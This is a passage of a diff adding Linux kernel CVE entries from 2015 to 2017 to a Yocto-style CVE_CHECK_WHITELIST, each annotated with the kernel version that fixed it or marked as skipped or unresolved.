+# Skipping CVE-2015-8943, no affected_versions
+
+# Skipping CVE-2015-8944, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-8950"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8952"
+
+# fixed-version: Fixed after version 4.3
+CVE_CHECK_WHITELIST += "CVE-2015-8953"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8955"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8956"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8961"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8962"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2015-8963"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8964"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-8966"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8967"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8970"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-9004"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9016"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9289"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0617"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-0723"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0728"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-0758"
+
+# Skipping CVE-2016-0774, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0821"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2016-0823"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10044"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10088"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-10147"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-10150"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10153"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10154"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10200"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10208"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10229"
+
+# fixed-version: Fixed after version 4.8rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10318"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10723"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10741"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10764"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10905"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10906"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10907"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-1237"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1575"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1576"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-1583"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2053"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2069"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2016-2070"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2085"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2117"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-2143"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2184"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2185"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2186"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2187"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2188"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2383"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2384"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2543"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2544"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2545"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2546"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2547"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2548"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2549"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2550"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2782"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2847"
+
+# Skipping CVE-2016-2853, no affected_versions
+
+# Skipping CVE-2016-2854, no affected_versions
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3044"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3070"
+
+# fixed-version: Fixed after version 4.6rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3134"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3135"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3136"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3137"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3138"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3139"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3140"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3156"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3157"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3672"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3689"
+
+# Skipping CVE-2016-3695, no affected_versions
+
+# Skipping CVE-2016-3699, no affected_versions
+
+# Skipping CVE-2016-3707, no affected_versions
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3713"
+
+# CVE-2016-3775 has no known resolution
+
+# CVE-2016-3802 has no known resolution
+
+# CVE-2016-3803 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2016-3841"
+
+# fixed-version: Fixed after version 4.8rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3857"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3951"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3955"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-3961"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4440"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4470"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4482"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4485"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4486"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4557"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4558"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4565"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4568"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4569"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4578"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4580"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4581"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4794"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4805"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4913"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4951"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4997"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4998"
+
+# fixed-version: Fixed after version 4.9rc2
+CVE_CHECK_WHITELIST += "CVE-2016-5195"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5243"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5244"
+
+# Skipping CVE-2016-5340, no affected_versions
+
+# Skipping CVE-2016-5342, no affected_versions
+
+# Skipping CVE-2016-5343, no affected_versions
+
+# Skipping CVE-2016-5344, no affected_versions
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5400"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5412"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5696"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5728"
+
+# fixed-version: Fixed after version 4.7rc6
+CVE_CHECK_WHITELIST += "CVE-2016-5828"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-5829"
+
+# CVE-2016-5870 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-6130"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6136"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6156"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-6162"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6187"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6197"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-6198"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6213"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6327"
+
+# fixed-version: Fixed after version 4.8rc3
+CVE_CHECK_WHITELIST += "CVE-2016-6480"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6516"
+
+# Skipping CVE-2016-6753, no affected_versions
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6786"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6787"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2016-6828"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7039"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-7042"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7097"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7117"
+
+# Skipping CVE-2016-7118, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7425"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7910"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7911"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-7912"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7913"
+
+# fixed-version: Fixed after version 4.6rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7914"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7915"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7916"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-7917"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-8399"
+
+# Skipping CVE-2016-8401, no affected_versions
+
+# Skipping CVE-2016-8402, no affected_versions
+
+# Skipping CVE-2016-8403, no affected_versions
+
+# Skipping CVE-2016-8404, no affected_versions
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8405"
+
+# Skipping CVE-2016-8406, no affected_versions
+
+# Skipping CVE-2016-8407, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8630"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8632"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8633"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8636"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8645"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8646"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8650"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8655"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8658"
+
+# CVE-2016-8660 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8666"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9083"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9084"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9120"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9178"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9191"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-9313"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9555"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-9576"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9588"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9604"
+
+# Skipping CVE-2016-9644, no affected_versions
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9685"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9754"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9755"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9756"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9777"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9793"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9794"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9806"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9919"
+
+# Skipping CVE-2017-0403, no affected_versions
+
+# Skipping CVE-2017-0404, no affected_versions
+
+# Skipping CVE-2017-0426, no affected_versions
+
+# Skipping CVE-2017-0427, no affected_versions
+
+# CVE-2017-0507 has no known resolution
+
+# CVE-2017-0508 has no known resolution
+
+# Skipping CVE-2017-0510, no affected_versions
+
+# Skipping CVE-2017-0528, no affected_versions
+
+# Skipping CVE-2017-0537, no affected_versions
+
+# CVE-2017-0564 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0605"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0627"
+
+# CVE-2017-0630 has no known resolution
+
+# CVE-2017-0749 has no known resolution
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0750"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-0786"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-0861"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000111"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000112"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000251"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000253"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000255"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000363"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000364"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-1000365"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000370"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000371"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000379"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000380"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000405"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-1000407"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-1000410"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10661"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10662"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10663"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10810"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-10911"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11089"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11176"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11472"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-11473"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-11600"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12134"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12146"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-12153"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12154"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12168"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12188"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12190"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-12192"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-12193"
+
+# fixed-version: Fixed after version 4.13rc4
+CVE_CHECK_WHITELIST += "CVE-2017-12762"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-13080"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13166"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13167"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13168"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13215"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-13216"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-13220"
+
+# CVE-2017-13221 has no known resolution
+
+# CVE-2017-13222 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-13305"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-13686"
+
+# CVE-2017-13693 has no known resolution
+
+# CVE-2017-13694 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13695"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13715"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14051"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14106"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-14140"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14156"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14340"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14489"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-14497"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14954"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-14991"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15102"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15115"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15116"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15121"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15126"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15127"
+
+# fixed-version: Fixed after version 4.14rc8
+CVE_CHECK_WHITELIST += "CVE-2017-15128"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15129"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15265"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15274"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15299"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-15306"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15537"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15649"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15868"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15951"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16525"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16526"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16527"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16528"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16529"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16530"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16531"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16532"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16533"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16534"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16535"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16536"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16537"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16538"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16643"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16644"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16645"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16646"
+
